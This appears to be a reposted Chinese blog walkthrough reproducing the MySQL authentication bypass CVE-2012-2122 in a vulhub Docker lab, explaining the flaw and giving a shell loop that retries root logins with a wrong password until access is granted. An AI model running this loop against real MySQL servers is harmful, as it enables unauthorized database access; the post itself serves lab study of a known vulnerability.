当前位置:   article > 正文

Mysql 身份认证绕过漏洞(CVE-2012-2122)_mysql绕过认证

mysql绕过认证

攻击机主机名:Mortor

靶机主机名:kali

漏洞介绍:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

实验步骤

在靶机搭建环境并启动容器

漏洞环境使用vulhub搭建,漏洞目录为vulhub/mysql/CVE-2012-2122

拉取镜像启动容器:docker-compose up -d

查看端口

环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,可以在攻击机直接采用shell脚本进行攻击连接数据库

可以先进行正常连接看看是否成功: mysql -h IP -uroot -p123456

IP为存在此漏洞的kali的IP,即靶机

利用Shell脚本复现

在攻击机利用shell脚本通过循环对靶机发起连接请求:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h <Ip> -P3306 ; done

可以看到在经过多次尝试后成功连接数据库,即复现成功

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/煮酒与君饮/article/detail/987249
推荐阅读
相关标签
  

闽ICP备14008679号